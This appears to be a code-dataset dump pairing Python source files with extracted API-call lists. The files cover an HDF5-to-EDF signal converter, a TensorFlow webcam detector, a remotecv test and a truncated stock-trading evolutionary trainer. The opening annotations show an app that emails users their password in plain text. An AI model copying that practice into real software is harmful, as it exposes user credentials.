((22291, 22341), 'logging.info', 'info', (['f"""Getting odometer: {self.odometer_reading}"""'], {}), "(f'Getting odometer: {self.odometer_reading}')\n", (22295, 22341), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((8753, 8810), 'tkinter.messagebox.showwarning', 
'messagebox.showwarning', (['"""Warning"""', '"""No input of username"""'], {}), "('Warning', 'No input of username')\n", (8775, 8810), False, 'from tkinter import messagebox, colorchooser\n'), ((8824, 8856), 'logging.warning', 'warning', (['"""No input of username."""'], {}), "('No input of username.')\n", (8831, 8856), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((8986, 9059), 'tkinter.messagebox.showinfo', 'messagebox.showinfo', (['"""Info"""', 'f"""Username \'{self.user}\' has already exists"""'], {}), '(\'Info\', f"Username \'{self.user}\' has already exists")\n', (9005, 9059), False, 'from tkinter import messagebox, colorchooser\n'), ((9075, 9129), 'logging.warning', 'warning', (['f"""Username \'{self.user}\' has already exists."""'], {}), '(f"Username \'{self.user}\' has already exists.")\n', (9082, 9129), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((9225, 9279), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of email"""'], {}), "('Warning', 'No input of email')\n", (9247, 9279), False, 'from tkinter import messagebox, colorchooser\n'), ((9293, 9322), 'logging.warning', 'warning', (['"""No input of email."""'], {}), "('No input of email.')\n", (9300, 9322), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((9418, 9475), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of password"""'], {}), "('Warning', 'No input of password')\n", (9440, 9475), False, 'from tkinter import messagebox, colorchooser\n'), ((9489, 9521), 'logging.warning', 'warning', (['"""No input of password."""'], {}), "('No input of password.')\n", (9496, 9521), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((9620, 9679), 'tkinter.messagebox.showerror', 'messagebox.showerror', (['"""Error"""', '"""Passwords are not the same"""'], {}), "('Error', 'Passwords are not the same')\n", (9640, 9679), 
False, 'from tkinter import messagebox, colorchooser\n'), ((9693, 9729), 'logging.error', 'error', (['"""Passwords are not the same."""'], {}), "('Passwords are not the same.')\n", (9698, 9729), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((10032, 10120), 'email.mime.text.MIMEText', 'MIMEText', (['f"""Dear {self.user}: \n\tYour Password is {self.word}."""', '"""plain"""', '"""utf-8"""'], {}), '(f"""Dear {self.user}: \n\tYour Password is {self.word}.""", \'plain\',\n \'utf-8\')\n', (10040, 10120), False, 'from email.mime.text import MIMEText\n'), ((11238, 11314), 'tkinter.messagebox.showinfo', 'messagebox.showinfo', (['"""Successful"""', 'f"""Successfuly create account {self.user}"""'], {}), "('Successful', f'Successfuly create account {self.user}')\n", (11257, 11314), False, 'from tkinter import messagebox, colorchooser\n'), ((11328, 11378), 'logging.info', 'info', (['f"""Successfuly create account \'{self.user}\'."""'], {}), '(f"Successfuly create account \'{self.user}\'.")\n', (11332, 11378), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((11457, 11521), 'tkinter.messagebox.showerror', 'messagebox.showerror', (['"""Error"""', 'f"""Email \'{self.em}\' is uncorrect"""'], {}), '(\'Error\', f"Email \'{self.em}\' is uncorrect")\n', (11477, 11521), False, 'from tkinter import messagebox, colorchooser\n'), ((11537, 11578), 'logging.error', 'error', (['f"""Email \'{self.em}\' is uncorrect."""'], {}), '(f"Email \'{self.em}\' is uncorrect.")\n', (11542, 11578), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((13465, 13544), 'tkinter.messagebox.showinfo', 'messagebox.showinfo', (['"""Info"""', 'f"""Username \'{self.userget}\' hasn\'t already exists"""'], {}), '(\'Info\', f"Username \'{self.userget}\' hasn\'t already exists")\n', (13484, 13544), False, 'from tkinter import messagebox, colorchooser\n'), ((13561, 13621), 'logging.warning', 'warning', (['f"""Username \'{self.userget}\' hasn\'t 
already exists."""'], {}), '(f"Username \'{self.userget}\' hasn\'t already exists.")\n', (13568, 13621), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((13973, 14000), 'hmac.compare_digest', 'compare_digest', (['sign', 'dsign'], {}), '(sign, dsign)\n', (13987, 14000), False, 'from hmac import new, compare_digest\n'), ((14139, 14199), 'tkinter.colorchooser.askcolor', 'colorchooser.askcolor', (['self.newcolor'], {'title': '"""Choose a color"""'}), "(self.newcolor, title='Choose a color')\n", (14160, 14199), False, 'from tkinter import messagebox, colorchooser\n'), ((14305, 14351), 'logging.info', 'info', (['f"""Edited color config: {self.newcolor}."""'], {}), "(f'Edited color config: {self.newcolor}.')\n", (14309, 14351), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((15630, 15691), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of manufacturer"""'], {}), "('Warning', 'No input of manufacturer')\n", (15652, 15691), False, 'from tkinter import messagebox, colorchooser\n'), ((15705, 15741), 'logging.warning', 'warning', (['"""No input of manufacturer."""'], {}), "('No input of manufacturer.')\n", (15712, 15741), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((16229, 16282), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of name"""'], {}), "('Warning', 'No input of name')\n", (16251, 16282), False, 'from tkinter import messagebox, colorchooser\n'), ((16296, 16324), 'logging.warning', 'warning', (['"""No input of name."""'], {}), "('No input of name.')\n", (16303, 16324), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((16789, 16842), 'tkinter.messagebox.showwarning', 'messagebox.showwarning', (['"""Warning"""', '"""No input of year"""'], {}), "('Warning', 'No input of year')\n", (16811, 16842), False, 'from tkinter import messagebox, colorchooser\n'), ((16856, 16884), 
'logging.warning', 'warning', (['"""No input of year."""'], {}), "('No input of year.')\n", (16863, 16884), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((17031, 17108), 'tkinter.messagebox.askyesno', 'messagebox.askyesno', (['"""Confirm"""', 'f"""Create new {ele}: \n{self.new_car_name}"""'], {}), '(\'Confirm\', f"""Create new {ele}: \n{self.new_car_name}""")\n', (17050, 17108), False, 'from tkinter import messagebox, colorchooser\n'), ((20381, 20389), 'os.getcwd', 'getcwd', ([], {}), '()\n', (20387, 20389), False, 'from os import getcwd, path, mkdir\n'), ((20636, 20651), 'json.dump', 'dump', (['msg', 'file'], {}), '(msg, file)\n', (20640, 20651), False, 'from json import dump, load\n'), ((20719, 20727), 'os.getcwd', 'getcwd', ([], {}), '()\n', (20725, 20727), False, 'from os import getcwd, path, mkdir\n'), ((20845, 20855), 'json.load', 'load', (['file'], {}), '(file)\n', (20849, 20855), False, 'from json import dump, load\n'), ((21067, 21075), 'os.getcwd', 'getcwd', ([], {}), '()\n', (21073, 21075), False, 'from os import getcwd, path, mkdir\n'), ((21183, 21198), 'json.dump', 'dump', (['msg', 'file'], {}), '(msg, file)\n', (21187, 21198), False, 'from json import dump, load\n'), ((21266, 21274), 'os.getcwd', 'getcwd', ([], {}), '()\n', (21272, 21274), False, 'from os import getcwd, path, mkdir\n'), ((21393, 21403), 'json.load', 'load', (['file'], {}), '(file)\n', (21397, 21403), False, 'from json import dump, load\n'), ((22108, 22144), 'logging.warning', 'warning', (['"""Rolling back an odometer."""'], {}), "('Rolling back an odometer.')\n", (22115, 22144), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((8916, 8924), 'os.getcwd', 'getcwd', ([], {}), '()\n', (8922, 8924), False, 'from os import getcwd, path, mkdir\n'), ((17308, 17396), 'tkinter.messagebox.showinfo', 'messagebox.showinfo', (['"""Successful"""', 'f"""Successfuly create {ele} \'{self.new_car_name}\'"""'], {}), '(\'Successful\',\n f"Successfuly 
create {ele} \'{self.new_car_name}\'")\n', (17327, 17396), False, 'from tkinter import messagebox, colorchooser\n'), ((17412, 17468), 'logging.info', 'info', (['f"""Successfuly create {ele} \'{self.new_car_name}\'."""'], {}), '(f"Successfuly create {ele} \'{self.new_car_name}\'.")\n', (17416, 17468), False, 'from logging import basicConfig, warning, info, error, DEBUG\n'), ((19853, 19861), 'os.getcwd', 'getcwd', ([], {}), '()\n', (19859, 19861), False, 'from os import getcwd, path, mkdir\n'), ((19898, 19906), 'os.getcwd', 'getcwd', ([], {}), '()\n', (19904, 19906), False, 'from os import getcwd, path, mkdir\n'), ((20106, 20114), 'os.getcwd', 'getcwd', ([], {}), '()\n', (20112, 20114), False, 'from os import getcwd, path, mkdir\n'), ((20518, 20533), 'json.dump', 'dump', (['msg', 'file'], {}), '(msg, file)\n', (20522, 20533), False, 'from json import dump, load\n'), ((10399, 10407), 'os.getcwd', 'getcwd', ([], {}), '()\n', (10405, 10407), False, 'from os import getcwd, path, mkdir\n'), ((13392, 13400), 'os.getcwd', 'getcwd', ([], {}), '()\n', (13398, 13400), False, 'from os import getcwd, path, mkdir\n'), ((19485, 19496), 'time.localtime', 'localtime', ([], {}), '()\n', (19494, 19496), False, 'from time import strftime, time, localtime\n'), ((19542, 19553), 'time.localtime', 'localtime', ([], {}), '()\n', (19551, 19553), False, 'from time import strftime, time, localtime\n'), ((4645, 4702), 'requests.get', 'get', (['"""https://www.easyicon.net/download/ico/1284184/128/"""'], {}), "('https://www.easyicon.net/download/ico/1284184/128/')\n", (4648, 4702), False, 'from requests import get\n')]
|
import os
import pyedflib
import h5py
import pytz
import datetime as dt
import struct
# Default per-channel EDF signal-header values.  Each entry is a
# one-element list that convert_h5_to_edf() replicates across channels:
# signed 16-bit digital range, microvolt units, +/-800 uV physical range,
# 250 Hz sampling rate.
psg_properties = {'digital_max': [32767],
                  'digital_min': [-32767],
                  'dimension': ['uV'],
                  'physical_min': [-800.0],
                  'physical_max': [800.0],
                  'prefilter': [''],
                  'sample_rate': [250],
                  "transducer": [""]}
def convert_h5_to_edf(h5_path, output_file="psg.edf", psg_properties=psg_properties):
    """Export EEG/EMG/EOG signals from an HDF5 file as a minimal EDF file.

    Parameters
    ----------
    h5_path : str
        Path to the source HDF5 file; channels are expected under
        'signals/eeg', 'signals/emg' and 'signals/eog'.
    output_file : str
        Path of the EDF file to write (default "psg.edf").
    psg_properties : dict
        Per-channel EDF header values; each value is a one-element list
        replicated across all channels.

    Returns
    -------
    str
        The path of the written EDF file (equal to `output_file`).
    """
    # `with` closes the HDF5 handle even on error (the original leaked it).
    with h5py.File(h5_path, "r") as h5:
        # Collect every channel path, grouped by modality.
        subfolders = ['signals/eeg', 'signals/emg', 'signals/eog']
        psg_labels = []
        for subfolder in subfolders:
            psg_labels.extend([f"{subfolder}/{x}" for x in list(h5[subfolder].keys())])
        # Recording start time; fall back to the UNIX epoch when absent.
        try:
            start_time = pytz.timezone('UTC').localize(
                dt.datetime.utcfromtimestamp(h5.attrs["start_time"])
            )
        except KeyError:
            start_time = pytz.timezone('UTC').localize(
                dt.datetime.utcfromtimestamp(0)
            )
        # One 1-second data record per sample_rate samples (was a
        # hard-coded 250 that duplicated psg_properties['sample_rate']).
        sample_rate = psg_properties['sample_rate'][0]
        number_of_data_records = int(len(h5[psg_labels[0]]) / sample_rate)
        duration = 1
        # Fixed-width EDF global header (256 bytes).
        header = (
            "0".ljust(8)
            + "".ljust(80)
            + "".ljust(80)
            + start_time.strftime("%d.%m.%y%H.%M.%S")
            + str((len(psg_labels) + 1) * 256).ljust(8)
            + "".ljust(44)
            + str(number_of_data_records).ljust(8)
            + str(duration).ljust(8)
            + str(len(psg_labels)).ljust(4)
        )
        # Per-signal header block (256 bytes per signal, field by field).
        subheaders = (
            "".join([str(x.split('/')[-1]).ljust(16) for x in psg_labels])
            + "".join([str(x).ljust(80) for x in psg_properties['transducer'] * len(psg_labels)])
            + "".join([str(x).ljust(8) for x in psg_properties['dimension'] * len(psg_labels)])
            + "".join([str(x).ljust(8) for x in psg_properties['physical_min'] * len(psg_labels)])
            + "".join([str(x).ljust(8) for x in psg_properties['physical_max'] * len(psg_labels)])
            + "".join([str(x).ljust(8) for x in psg_properties['digital_min'] * len(psg_labels)])
            + "".join([str(x).ljust(8) for x in psg_properties['digital_max'] * len(psg_labels)])
            + "".join([str(x).ljust(80) for x in psg_properties['prefilter'] * len(psg_labels)])
            + "".join([str(x).ljust(8) for x in psg_properties['sample_rate'] * len(psg_labels)])
            + "".ljust(32) * len(psg_labels)
        )
        edf_path = output_file

        def transform(x, lo, hi):
            # Map physical values in [lo, hi] onto signed 16-bit integers.
            # (Parameters renamed from min/max to avoid shadowing builtins.)
            if hi < lo:
                lo, hi = hi, lo
            x = x.clip(lo, hi)
            return (((x - lo) / (hi - lo)) * (2 ** 16 - 1) - 2 ** 15).astype(int)

        with open(edf_path, "wb") as f:
            f.write(bytes(header, "UTF-8"))
            f.write(bytes(subheaders, "UTF-8"))
            # Digitise every channel once, up front.
            data_transformed = []
            for data_path in psg_labels:
                data_transformed.append(transform(h5[data_path][:],
                                                  psg_properties['physical_min'][0],
                                                  psg_properties['physical_max'][0]))
            # Write record i: one second of each channel, as packed shorts.
            for i in range(number_of_data_records):
                data = []
                for signal_transformed in data_transformed:
                    data += list(signal_transformed[i * int(sample_rate): int(sample_rate * (i + 1))])
                f.write(struct.pack("h" * len(data), *data))
    return edf_path
|
[
"datetime.datetime.utcfromtimestamp",
"h5py.File",
"pytz.timezone"
] |
[((540, 563), 'h5py.File', 'h5py.File', (['h5_path', '"""r"""'], {}), "(h5_path, 'r')\n", (549, 563), False, 'import h5py\n'), ((863, 915), 'datetime.datetime.utcfromtimestamp', 'dt.datetime.utcfromtimestamp', (["h5.attrs['start_time']"], {}), "(h5.attrs['start_time'])\n", (891, 915), True, 'import datetime as dt\n'), ((820, 840), 'pytz.timezone', 'pytz.timezone', (['"""UTC"""'], {}), "('UTC')\n", (833, 840), False, 'import pytz\n'), ((1011, 1042), 'datetime.datetime.utcfromtimestamp', 'dt.datetime.utcfromtimestamp', (['(0)'], {}), '(0)\n', (1039, 1042), True, 'import datetime as dt\n'), ((968, 988), 'pytz.timezone', 'pytz.timezone', (['"""UTC"""'], {}), "('UTC')\n", (981, 988), False, 'import pytz\n')]
|
import cv2
import numpy as np
import os
# import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow as tf
import zipfile
import pathlib
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from IPython.display import display
from object_detection.utils import ops as utils_ops
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
def load_model(model_name):
    """Load the exported object-detection SavedModel.

    NOTE(review): `model_name` is currently unused — the SavedModel
    directory is hard-coded below; confirm whether the path should be
    derived from the argument instead.
    """
    return tf.saved_model.load(
        '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/')
# Label map (class id -> display name) used when drawing detections.
PATH_TO_LABELS = '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/labelmap.pbtxt'
category_index = label_map_util.create_category_index_from_labelmap(
    PATH_TO_LABELS, use_display_name=True)
# NOTE(review): load_model() ignores this name and loads a hard-coded path.
model_name = 'saved_model.pb'
detection_model = load_model(model_name)
def run_inference_for_single_image(model, image):
    """Run the detector on a single image and return its outputs as numpy values.

    Returns a dict with 'num_detections', 'detection_classes' (int64),
    'detection_boxes', 'detection_scores' and, when the model produces masks,
    'detection_masks_reframed' projected onto full-image coordinates.
    """
    image = np.asarray(image)
    # The SavedModel signature expects a batched tensor, so add a batch axis.
    batched_input = tf.convert_to_tensor(image)[tf.newaxis, ...]
    infer = model.signatures['serving_default']
    raw_outputs = infer(batched_input)
    # Strip the batch dimension and keep only the reported number of detections.
    detection_count = int(raw_outputs.pop('num_detections'))
    outputs = {name: tensor[0, :detection_count].numpy()
               for name, tensor in raw_outputs.items()}
    outputs['num_detections'] = detection_count
    # Class ids must be integers for label lookup.
    outputs['detection_classes'] = outputs['detection_classes'].astype(np.int64)
    if 'detection_masks' in outputs:
        # Re-project the per-box masks onto the original image's pixel grid.
        reframed_masks = utils_ops.reframe_box_masks_to_image_masks(
            outputs['detection_masks'], outputs['detection_boxes'],
            image.shape[0], image.shape[1])
        binarized = tf.cast(reframed_masks > 0.5, tf.uint8)
        outputs['detection_masks_reframed'] = binarized.numpy()
    return outputs
def show_inference(model, frame):
    """Detect objects in one frame and return a copy annotated with boxes/labels."""
    annotated = np.array(frame)  # work on a copy of the captured frame
    detections = run_inference_for_single_image(model, annotated)
    # Draw boxes, class labels and scores directly onto the copy.
    vis_util.visualize_boxes_and_labels_on_image_array(
        annotated,
        detections['detection_boxes'],
        detections['detection_classes'],
        detections['detection_scores'],
        category_index,
        instance_masks=detections.get('detection_masks_reframed', None),
        use_normalized_coordinates=True,
        line_thickness=2)
    return(annotated)
# Stream frames from the default webcam through the detector until 'q' is pressed.
video_capture = cv2.VideoCapture(0)
while True:
    grabbed, current_frame = video_capture.read()
    annotated_frame = show_inference(detection_model, current_frame)
    cv2.imshow('object detection', annotated_frame)
    # waitKey also pumps the GUI event loop; quit on 'q'.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
video_capture.release()
cv2.destroyAllWindows()
# cv2.resize(Imagenp, (800,600)
|
[
"cv2.waitKey",
"tensorflow.convert_to_tensor",
"numpy.asarray",
"cv2.imshow",
"object_detection.utils.label_map_util.create_category_index_from_labelmap",
"cv2.VideoCapture",
"object_detection.utils.ops.reframe_box_masks_to_image_masks",
"tensorflow.cast",
"numpy.array",
"cv2.destroyAllWindows",
"tensorflow.saved_model.load"
] |
[((801, 894), 'object_detection.utils.label_map_util.create_category_index_from_labelmap', 'label_map_util.create_category_index_from_labelmap', (['PATH_TO_LABELS'], {'use_display_name': '(True)'}), '(PATH_TO_LABELS,\n use_display_name=True)\n', (851, 894), False, 'from object_detection.utils import label_map_util\n'), ((3196, 3215), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (3212, 3215), False, 'import cv2\n'), ((3471, 3494), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3492, 3494), False, 'import cv2\n'), ((522, 649), 'tensorflow.saved_model.load', 'tf.saved_model.load', (['"""/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/"""'], {}), "(\n '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/'\n )\n", (541, 649), True, 'import tensorflow as tf\n'), ((1032, 1049), 'numpy.asarray', 'np.asarray', (['image'], {}), '(image)\n', (1042, 1049), True, 'import numpy as np\n'), ((1148, 1175), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['image'], {}), '(image)\n', (1168, 1175), True, 'import tensorflow as tf\n'), ((2637, 2652), 'numpy.array', 'np.array', (['frame'], {}), '(frame)\n', (2645, 2652), True, 'import numpy as np\n'), ((3351, 3390), 'cv2.imshow', 'cv2.imshow', (['"""object detection"""', 'Imagenp'], {}), "('object detection', Imagenp)\n", (3361, 3390), False, 'import cv2\n'), ((2123, 2265), 'object_detection.utils.ops.reframe_box_masks_to_image_masks', 'utils_ops.reframe_box_masks_to_image_masks', (["output_dict['detection_masks']", "output_dict['detection_boxes']", 'image.shape[0]', 'image.shape[1]'], {}), "(output_dict['detection_masks'],\n output_dict['detection_boxes'], image.shape[0], image.shape[1])\n", (2165, 2265), True, 'from object_detection.utils import ops as utils_ops\n'), ((2322, 2371), 'tensorflow.cast', 'tf.cast', (['(detection_masks_reframed > 0.5)', 'tf.uint8'], {}), '(detection_masks_reframed > 0.5, 
tf.uint8)\n', (2329, 2371), True, 'import tensorflow as tf\n'), ((3398, 3412), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3409, 3412), False, 'import cv2\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import mock
from preggy import expect
from unittest import TestCase
from tests import read_fixture
from remotecv.pyres_tasks import DetectTask
from remotecv.utils import config
class DetectTaskTestCase(TestCase):
    """Exercises DetectTask end-to-end against a mocked remotecv config."""

    def test_should_run_detector_task(self):
        # Wire remotecv's global config with mocks: fixtures feed the loader,
        # and the store mock records what the task persists.
        result_store = mock.Mock()
        config.loader = mock.Mock(load_sync=read_fixture)
        config.store = result_store
        config.store.ResultStore = mock.Mock(return_value=result_store)
        DetectTask.perform('all', 'multiple_faces_bw.jpg', 'test-key')
        stored_args = result_store.store.call_args[0]
        expect(stored_args[0]).to_equal('test-key')
        expect(stored_args[1]).to_be_greater_than(20)
        # Each detection is a numeric (x, y, w, h) box.
        for coordinate in range(4):
            expect(stored_args[1][0][coordinate]).to_be_numeric()
|
[
"preggy.expect",
"mock.Mock",
"remotecv.pyres_tasks.DetectTask.perform"
] |
[((326, 337), 'mock.Mock', 'mock.Mock', ([], {}), '()\n', (335, 337), False, 'import mock\n'), ((362, 395), 'mock.Mock', 'mock.Mock', ([], {'load_sync': 'read_fixture'}), '(load_sync=read_fixture)\n', (371, 395), False, 'import mock\n'), ((465, 499), 'mock.Mock', 'mock.Mock', ([], {'return_value': 'store_mock'}), '(return_value=store_mock)\n', (474, 499), False, 'import mock\n'), ((508, 570), 'remotecv.pyres_tasks.DetectTask.perform', 'DetectTask.perform', (['"""all"""', '"""multiple_faces_bw.jpg"""', '"""test-key"""'], {}), "('all', 'multiple_faces_bw.jpg', 'test-key')\n", (526, 570), False, 'from remotecv.pyres_tasks import DetectTask\n'), ((624, 639), 'preggy.expect', 'expect', (['call[0]'], {}), '(call[0])\n', (630, 639), False, 'from preggy import expect\n'), ((669, 684), 'preggy.expect', 'expect', (['call[1]'], {}), '(call[1])\n', (675, 684), False, 'from preggy import expect\n'), ((716, 737), 'preggy.expect', 'expect', (['call[1][0][0]'], {}), '(call[1][0][0])\n', (722, 737), False, 'from preggy import expect\n'), ((762, 783), 'preggy.expect', 'expect', (['call[1][0][1]'], {}), '(call[1][0][1])\n', (768, 783), False, 'from preggy import expect\n'), ((808, 829), 'preggy.expect', 'expect', (['call[1][0][2]'], {}), '(call[1][0][2])\n', (814, 829), False, 'from preggy import expect\n'), ((854, 875), 'preggy.expect', 'expect', (['call[1][0][3]'], {}), '(call[1][0][3])\n', (860, 875), False, 'from preggy import expect\n')]
|
"""
"""
from configparser import ConfigParser, SectionProxy
from os import path
import os
from typing import List, Tuple, Any, Optional, Dict
import numpy as np
import tqdm
from general_utils.config import config_util, config_parser_singleton
from general_utils.exportation import csv_exportation
from general_utils.logging import logger
from data_providing_module import configurable_registry, data_provider_registry
from data_providing_module.data_providers import data_provider_static_names
from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation
CONSUMER_ID = "Evolutionary Computation Trainer"
# Option names for this consumer's configuration-file section.
_ENABLED_CONFIGURATION_IDENTIFIER = 'enabled'
_EXAMPLE_COMBINATION_FACTOR_IDENTIFIER = 'Periods Per Example'
_TDP_BLOCK_LENGTH_IDENTIFIER = "trend deterministic data provider block length"
_NUM_EPOCHS_IDENTIFIER = "Number of Epochs"
_NUM_INDIVIDUALS_IDENTIFIER = "Number of Individuals in Evolutionary Population"
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER = "Model Saving Epoch Interval"
_TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER = "Days Per Example"
_MUTATION_CHANCE_IDENTIFIER = "Mutation Chance Per Genome"
_MUTATION_MAGNITUDE_IDENTIFIER = "Mutation Magnitude"
_CROSSOVER_CHANCE_IDENTIFIER = "Crossover Chance Per Genome"
# Identifiers and defaults correspond positionally (index i of one matches index i of the other).
_CONFIGURABLE_IDENTIFIERS = [_ENABLED_CONFIGURATION_IDENTIFIER, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER,
                             _TDP_BLOCK_LENGTH_IDENTIFIER, _NUM_EPOCHS_IDENTIFIER, _NUM_INDIVIDUALS_IDENTIFIER,
                             _MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER, _TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER,
                             _MUTATION_CHANCE_IDENTIFIER, _MUTATION_MAGNITUDE_IDENTIFIER, _CROSSOVER_CHANCE_IDENTIFIER]
_CONFIGURATION_DEFAULTS = ['False', '22', '2520', '100', '100', '5', '5', '.1', '.15', '.5']
def string_serialize_predictions(predictions) -> str:
    """Render per-ticker model predictions as a human-readable report.

    ``predictions`` maps ticker -> (per-model [buy, sell] predictions,
    per-model [buy_accuracy, sell_accuracy] pairs).
    """
    per_model_fmt = "{}:\n\t\tBuy: {}\n\t\tSell: {}\n\t\tAccuracies: {:.2f}, {:.2f}"
    pieces = []
    for ticker, (model_predictions, accuracies) in predictions.items():
        rendered = [
            per_model_fmt.format(
                idx + 1,
                model_predictions[idx][0] == 1,
                model_predictions[idx][1] == 1,
                accuracies[idx][0],
                accuracies[idx][1],
            )
            for idx in range(len(model_predictions))
        ]
        # One indented slot per model under the ticker heading.
        header = "{}:{}\n".format(ticker, "\n\t{}" * len(model_predictions))
        pieces.append(header.format(*rendered))
    return "".join(pieces)
def export_predictions(predictions, output_dir) -> None:
    """Write EC predictions and observed accuracies to ``<output_dir>/ec.csv``."""
    target_file = output_dir + path.sep + "ec.csv"
    rows = []
    for ticker, (raw_predictions, observed_accuracies) in predictions.items():
        # Convert the 0/1 prediction matrix into boolean buy/sell flags.
        flags = np.where(raw_predictions == 1, True, False)
        rows.append((ticker, "", ""))
        for model_idx in range(len(flags)):
            rows.append((",Model:", str(model_idx)))
            rows.append((",Buy:", str(flags[model_idx][0])))
            rows.append((",Buy Accuracy:", str(observed_accuracies[model_idx][0])))
            rows.append((",Sell:", str(flags[model_idx][1])))
            rows.append((",Sell Accuracy:", str(observed_accuracies[model_idx][1])))
    with open(target_file, 'w') as handle:
        for row in rows:
            handle.write(",".join(row) + '\n')
def prediction_truth_calculation(predictions: List[np.ndarray],
                                 closing_prices: List[float],
                                 num_days_per_prediction: int = 5):
    """Score buy/sell predictions against price movement over the following days.

    Args:
        predictions: one entry per day; each entry holds one ``[buy, sell]``
            prediction per model (truthy = the model signalled buy/sell).
        closing_prices: per-day closing prices aligned with ``predictions``.
        num_days_per_prediction: how many subsequent days a prediction is
            scored against before its truth table is emitted.

    Returns:
        A list (one item per fully scored day) of per-model
        ``[buy_was_right, sell_was_right]`` flag pairs. A signal counts as
        right if any day in its window moved in the predicted direction.
    """
    prediction_entry = Tuple[List[np.ndarray], float, List[List[bool]]]
    # Ring buffer of the last num_days_per_prediction+1 days of
    # (predictions, reference price, truth flags); current_index is the
    # slot to be overwritten (i.e. the oldest entry).
    prediction_array: List[Optional[prediction_entry]] = [None] * (num_days_per_prediction + 1)
    current_index = 0
    ret = []
    for i in range(len(predictions)):
        # Update the truth flags of every still-open window with today's close.
        for j in range(1, len(prediction_array)):
            index = (j + current_index) % len(prediction_array)
            if prediction_array[index] is None:
                continue
            for k in range(len(prediction_array[index][0])):
                prediction, reference_price, prediction_truths = prediction_array[index]
                prediction = prediction[k]
                prediction_truths = prediction_truths[k]
                if reference_price < closing_prices[i]:
                    # Price rose: a buy signal was right; an absent sell signal was right.
                    if prediction[0]:
                        prediction_truths[0] = True
                    if not prediction[1]:
                        prediction_truths[1] = True
                elif reference_price > closing_prices[i]:
                    # Price fell: an absent buy signal was right; a sell signal was right.
                    if not prediction[0]:
                        prediction_truths[0] = True
                    if prediction[1]:
                        prediction_truths[1] = True
        # The slot about to be overwritten has had its full window scored.
        if prediction_array[current_index] is not None:
            prediction_truth = prediction_array[current_index][-1]
            ret.append(prediction_truth)
        # BUG FIX: the original used `[[False, False]] * n`, which aliases ONE
        # inner list across every model, so one model's correct call marked all
        # models correct. Build an independent flag pair per model instead.
        prediction_array[current_index] = (
            [*predictions[i]], closing_prices[i],
            [[False, False] for _ in predictions[i]])
        current_index += 1
        current_index %= len(prediction_array)
    return ret
def extract_accuracy_from_prediction_truths(prediction_truths: List[List[List[bool]]]):
    """Return, per model and per signal, the fraction of windows that scored True.

    ``prediction_truths`` is a list of windows, each holding one
    ``[buy_was_right, sell_was_right]`` pair per model.
    """
    window_count = len(prediction_truths)
    model_count = len(prediction_truths[0])
    signal_count = len(prediction_truths[0][0])
    accuracies = np.zeros((model_count, signal_count))
    # Count True flags per (model, signal) cell across all windows.
    for window in prediction_truths:
        for model_idx, signal_flags in enumerate(window):
            for signal_idx, was_correct in enumerate(signal_flags):
                if was_correct:
                    accuracies[model_idx][signal_idx] += 1
    accuracies /= window_count
    return accuracies
class EvolutionaryComputationManager(data_provider_registry.DataConsumerBase):
    """Data consumer that trains and applies an evolutionary trading population.

    Consumes per-ticker (indicator block, closing prices) data, trains a
    TradingPopulation (checkpointing to disk), and can later reload the
    checkpoint to produce buy/sell predictions with per-model accuracies.
    """

    def __init__(self):
        super().__init__()
        # Register so this consumer's config section is created/loaded.
        configurable_registry.config_registry.register_configurable(self)
        # Population is created lazily in consume_data/predict_data.
        self.__contained_population: Optional[TradingPopulation] = None
        # Placeholder hyper-parameters; load_configuration overwrites them
        # from the configuration file.
        self.__periods_per_example = 5
        self.__num_epochs = 100
        self.__num_individuals = 100
        self.__save_interval = 5
        self.__mutation_chance = .1
        self.__mutation_magnitude = .15
        self.__crossover_chance = .5

    def consume_data(self, data: Dict[str, Tuple[np.ndarray, List[float]]], passback, output_dir):
        """Train the population on ``data``, checkpointing under ``output_dir``.

        Resumes from ``evolution_individuals.ecp`` when a checkpoint exists;
        otherwise builds a fresh population sized from the first ticker's data.
        """
        out_dir = output_dir + path.sep + 'evolutionary_computation_models'
        if not path.exists(out_dir):
            os.mkdir(out_dir)
        previous_model_file = out_dir + path.sep + "evolution_individuals.ecp"
        if path.exists(previous_model_file):
            # Constructor args are dummies; load() restores the real state.
            self.__contained_population = TradingPopulation((0, 0), 0, 0)
